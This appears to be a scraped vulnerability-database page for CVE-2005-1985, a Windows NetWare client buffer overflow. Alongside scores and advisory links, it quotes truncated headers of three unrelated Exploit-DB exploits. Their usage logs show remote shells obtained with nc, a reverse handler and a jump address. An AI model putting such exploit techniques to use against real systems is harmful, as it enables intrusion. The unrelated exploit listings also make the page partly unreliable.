CVE-2005-1985
published 2005-10-13CVE-2005-1985: The Client Service for NetWare (CSNW) on Microsoft Windows 2000 SP4, XP SP1 and Sp2, and Server 2003 SP1 and earlier, allows remote attackers to execute…
PriorityP349high7.5CVSS 2.0
AVNACLAuNCPIPAP
EPSS
36.33%
98.3th percentile
The Client Service for NetWare (CSNW) on Microsoft Windows 2000 SP4, XP SP1 and Sp2, and Server 2003 SP1 and earlier, allows remote attackers to execute arbitrary code due to an "unchecked buffer" when processing certain crafted network messages.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow
exploitdb·2006-01-16
CVE-2005-3116 Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow
Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow
---
/*
DESCRIPTION
Veritas NetBackup Stack Overflow (tcp/13701)
"Volume Manager Daemon" Module
Advisories
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336
http://www.frsirt.com/english/advisories/2005/2349
USAGE
C:\NetBackup>nb 192.168.0.2 4444 192.168.0.200 0
Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow.
Sending first buffer.
Sending second buffer.
C:\NetBackup>nc 192.168.0.200 4444
Microsoft Windows 2000 [versie 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
INFORMATION
I wrote this just for educational purposes :).
Because the buffer is only very small, I had to write small shellcode.
The code is less than 100 bytes, and there are 6 bytes left.
Exploit-DB
Yager 5.24 - Remote Buffer Overflow
exploitdb·2005-04-25
CVE-2005-1163 Yager 5.24 - Remote Buffer Overflow
Yager 5.24 - Remote Buffer Overflow
---
/*
*
* Yager > 1
* --[ sending handshake [UDP]...done!
* --[ reading server response [UDP]...done!
* --[ server port: 1089
* --[ connecting to 192.168.2.100:1089 [TCP]...done!
* --[ exploiting WinXP Pro SP1 GER
* --[ ret: 0x300686bd [ jmp esp in binkw32.dll ]
* --[ exploiting packet overflow...
* --[ sending packet...done!
* --[ starting reverse handler [port: 1337]...done!
* --[ incomming connection from: 192.168.2.100
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\Yager>
*
*/
#include
#include
#include
#include
#define PORT_UDP 34855
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
/*
*
*
Exploit-DB
RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow
exploitdb·2005-03-07
CVE-2005-0455 RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow
RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow
---
/* RealPlayer .smil file buffer overflow
Coded by nolimit@CiSO & Buzzdee
greets to COREiSO & #news & flare & class101 & ESI & RVL & everyone else I forget
This uses a seh overwrite method, which takes advantage of the SEH being placed
in multiple locations over the different OS's. Because of this, it should be
completely universal. :).
Also, we added SEH for enterprise and Standard, if you have a diff 2k3 then deal with it and write your own in.
C:\tools>nc -vv SERVER 1554
SERVER [192.168.1.93] 1554 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\Real\RealPlayer>
*/
#include
#include
#include
char pre[]=
"\n"
" \n"
" \n"
" \n"
" \n"
" \n"
" \n"
" "
"";
char ove
No writeups or analysis indexed.
http://secunia.com/advisories/17165http://securitytracker.com/id?1015041http://www.osvdb.org/19922http://www.securityfocus.com/bid/15066https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-046https://exchange.xforce.ibmcloud.com/vulnerabilities/21700https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1106https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1210https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1536https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1544https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A910http://secunia.com/advisories/17165http://securitytracker.com/id?1015041http://www.osvdb.org/19922http://www.securityfocus.com/bid/15066https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-046https://exchange.xforce.ibmcloud.com/vulnerabilities/21700https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1106https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1210https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1536https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1544https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A910
2005-10-13
Published